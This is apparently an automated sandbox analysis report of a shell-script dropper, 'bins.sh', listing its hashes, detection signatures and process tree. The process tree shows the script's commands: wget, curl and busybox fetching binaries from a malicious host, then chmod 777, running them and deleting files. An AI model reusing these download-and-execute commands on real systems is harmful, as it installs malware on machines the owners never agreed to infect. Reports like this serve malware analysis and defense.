Resubmissions

16/12/2024, 04:16

241216-ev6w7stmdz 7

13/12/2024, 21:25

241213-z9pxfszqgq 9

Analysis

  • max time kernel
    598s
  • max time network
    313s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    16/12/2024, 04:16

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    7c06e835a83b81914ba9a19c15e66d76

  • SHA1

    bc618204890c0b179a00d6d253001a6e27197aa1

  • SHA256

    cf982818df24e8535c11ddeee9410d1545a54203538acf160c505dcb7ad1cbeb

  • SHA512

    4bbe783a5be8061d432c7a90b941059b63a1adc687741621537fbde9f2631c045bccb8ef3d0fcbb9aac75dd15f9ab949678fd3c6b879b3e4ba7d74b585e5f9d2

  • SSDEEP

    192:IWWlW1WGWfWLWqVl9MT3rtdp2n3Viuz3WdNdGmX4spz3WdN8X4mWlW1WGWfWLWVh:jAtdp2n3Vi9GOMdp2n3Fu

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Checks CPU configuration 1 TTPs 2 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 4 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 5 IoCs

    Adversaries may gather information about the network configuration of a system.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:641
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:643
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
          2⤵
          • System Network Configuration Discovery
          PID:645
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • System Network Configuration Discovery
          PID:655
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
          2⤵
          • System Network Configuration Discovery
          PID:811
        • /bin/chmod
          chmod 777 YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
          2⤵
          • File and Directory Permissions Modification
          PID:812
        • /tmp/YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
          ./YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
          2⤵
            PID:813
          • /bin/rm
            rm YuuS7A8Wl0m0ZCtQNQ7BTgbisfrPDTXdwA
            2⤵
              PID:814
            • /usr/bin/wget
              wget http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX
              2⤵
              • System Network Configuration Discovery
              PID:815
            • /usr/bin/curl
              curl -O http://conn.masjesu.zip/bins/CDze2HSU0BVUicsNBekeLhCB9oqZHJYjYX
              2⤵
              • Checks CPU configuration
              • Reads runtime system information
              • System Network Configuration Discovery
              PID:816

          Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads